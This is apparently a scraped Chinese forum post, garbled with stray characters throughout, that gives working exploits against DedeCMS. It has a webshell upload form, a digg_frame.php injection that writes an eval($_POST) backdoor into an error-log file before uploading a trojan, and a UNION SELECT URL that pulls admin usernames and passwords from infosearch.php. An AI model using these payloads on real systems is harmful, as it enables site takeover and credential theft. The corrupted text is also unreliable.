( u0 b* J+ N2 tSelect U Shell <input type='file' name='uploadfile' size='25' />
/ q. E  c  ]: m' N/ U& W% n<input type='submit' name='sb1' value='确定' />
  s+ Z0 C+ \  _( F3 Y0 a  C</form>
8 }7 m7 N1 O* I5 d4 _<br />It's just a exp for the bug of Dedecms V55...<br />
/ V2 {" ]0 z8 w7 Z( {$ F3 ?Need register_globals = on...<br />2 z& s$ t# ?" P* c
Fun the game,get a webshell at /data/cache/fly.php...<br />/ k& J+ j* q+ H( K! p  W- t. c2 x
</body>
0 y) S* p: h3 M$ j; j</html>- ^% I7 b; V9 e3 C3 p* W
: v9 b8 d5 I+ k
0 _9 ]6 r9 t- g5 Q# g
0 ]2 X2 J' M! \" z  i3 q
8 y0 L- O% d) ~, l  k) I
' H: O9 r) j# X5 T( U

, v7 Z  F+ k. ?0 U0 ~3 X- L
2 x( B! _$ g! C* V' I5 z& C& d0 ?# q! R4 R& |; h* Z

+ i% }3 a7 p) i/ l' }1 I- r$ L, l0 U" B2 L6 m+ m; o' {
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞8 V) Z, e5 o6 \3 \2 F; i$ h
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
! C& w% o) R* v, ]' p4 x1. 访问网址：
, r8 _( S8 [# F  [6 W+ M1 vhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>) o6 H. P. ?+ h: W
可看见错误信息
7 o" `0 A; V+ S
+ ], Q) c' Q5 g6 b8 f' P
6 r  r. E7 c- B( J3 n2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。2 F3 o5 o8 {' S2 [- z: V
int(3) Error: Illegal double '1024e1024' value found during parsing$ K: q: b  ]" r1 k* o. }
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>! J: l1 a( O3 m+ Z7 W9 R% L
- ?. O9 R4 V, {8 e& t

1 O. C% g  t  K1 x* z2 Q% \% B9 Z3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是
& E# b) ]$ [; O# Z: J& |7 E+ h, s5 l1 E( Y% Q. O9 K1 g6 R

% h; x: ~1 V5 u4 b<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>0 R9 q4 W" f# P3 k: ~* m, u
/ H4 ~0 Q7 A" Q/ m3 F3 S9 w3 n

" h* |5 k% w9 P% F按确定后的看到第2步骤的信息表示文件木马上传成功.
4 `, ]. P' c1 {% Q" E  h, z. x  m; K; J0 G

+ k8 T# R/ C7 X, \! o) f: r
0 J* _7 }, G; B! a
+ H/ A- }$ I. s  N( n* o/ x, d$ Y" I

( ^. c# f% I& k1 Y/ T
1 v, }: S; j8 y, S7 ?7 m
/ V% c1 M+ I5 s$ r* [
/ k* Y- u; ]8 w" e9 F/ g' j% l, T+ k5 [" a1 `9 B6 t

( P& x. B* Z% x: l' L, m% ?6 _9 a' N, D7 J: B) W' X( M
织梦(DedeCms)plus/infosearch.php 文件注入漏洞& U5 R' R5 p% f
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册